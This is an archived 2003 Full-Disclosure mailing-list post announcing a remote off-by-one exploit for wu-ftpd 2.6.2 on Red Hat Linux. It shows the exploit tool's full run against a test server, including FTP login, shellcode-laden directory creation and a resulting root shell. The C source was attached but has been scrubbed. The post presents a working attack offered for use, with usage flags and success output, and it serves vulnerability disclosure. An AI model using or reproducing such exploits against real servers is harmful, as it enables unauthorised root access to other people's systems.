[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030804062219.10295.qmail@hackermail.com>
From: xploit at hackermail.com (dong-h0un U)
Subject: wu-ftpd-2.6.2 off-by-one remote exploit.
I succeeded in RedHat Linux (x86) wu-2.6.2(1), 2.6.2(2), 2.6.1, 2.6.0. (Most version).
This is never fake.
Excellent Advisory was already announced (2003/07/31):
http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
This information was very useful to me.
I'm thankful to them.
This works well in my server.
If don't work in your server ?
Reason that don't work in other server is various kinds.
(For example, compiler version, operating system kind,
or, shellcode's position mistake, environment variable etc ...)
I don't think about those. Exert your force. :-)
INetCop Security is poor now. They have a few server.
* Exploit result:
--
bash$ cat /etc/redhat-release
Red Hat Linux release 6.1 (Cartman)
bash$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
--
bash$ ./0x82-wu262 -htest.inetcop.org -ux82 -pmy_pass -n21 -t2
0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.
[*] Target: RedHat Linux 6.x Version wu-2.6.2(2) compile.
[+] address: 0x806aaf0.
[*] #1 Try, test.inetcop.org:21 ... [ OK ]
[1] ftpd connection login.
[*] ftpd connection success.
[+] User id input.
[+] User password input.
[*] User x82 logged in.
[2] send exploit code.
[+] 01: make 0x41414141 directory.
[+] 02: make shell-code directory.
[+] 03: make 0x43434343 directory.
[+] 04: make 0x44444444 directory.
[+] 05: make 0x45454545 directory.
[+] 06: make 0x46464646 directory.
[+] 07: make 0x47474747 directory.
[+] 08: make 0x48484848 directory.
[+] 09: make 0x49494949 directory.
[+] 10: make 0x50505050 directory.
[+] 11: make 0x51515151 directory.
[+] 12: make 0x52525252 directory.
[+] 13: make 0x53535353 directory.
[+] 14: make 0x54545454 directory.
[+] 15: make 0x55555555 directory.
[+] Ok, MKD &shellcode_dir.
[+] #2 Try, test.inetcop.org:21 ... [ OK ]
[3] ftpd connection login.
[*] ftpd connection success.
[+] User id input.
[+] User password input.
[*] User x82 logged in.
[4] send exploit code.
[+] 01: make 0x41414141 directory.
[+] 02: make shell-code directory.
[+] 03: make 0x43434343 directory.
[+] 04: make 0x44444444 directory.
[+] 05: make 0x45454545 directory.
[+] 06: make 0x46464646 directory.
[+] 07: make 0x47474747 directory.
[+] 08: make 0x48484848 directory.
[+] 09: make 0x49494949 directory.
[+] 10: make 0x50505050 directory.
[+] 11: make 0x51515151 directory.
[+] 12: make 0x52525252 directory.
[+] 13: make 0x53535353 directory.
[+] 14: make 0x54545454 directory.
[+] 15: make 0x55555555 directory.
[+] Ok, RMD &shellcode_dir.
[5] Waiting, execute the shell ...
[*] Send, command packet !
x82 is happy, x82 is happy, x82 is happy
Linux test.inetcop.org 2.2.12-20kr #1 Tue Oct 12 16:46:36 KST 1999 i686 unknown
uid=0(root) gid=0(root) egid=501(x82) groups=501(x82),500(secure)
bash#
--
P.S: Please, don't give me question about exploit, mail.
Sorry, for my poor english.
--
_______________________________________________
Get your free email from http://www.hackermail.com
Powered by Outblaze
-------------- next part --------------
A non-text attachment was scrubbed...
Name: 0x82-wu262.c
Type: application/octet-stream
Size: 17692 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030804/1bd3c730/0x82-wu262.obj
Powered by blists - more mailing lists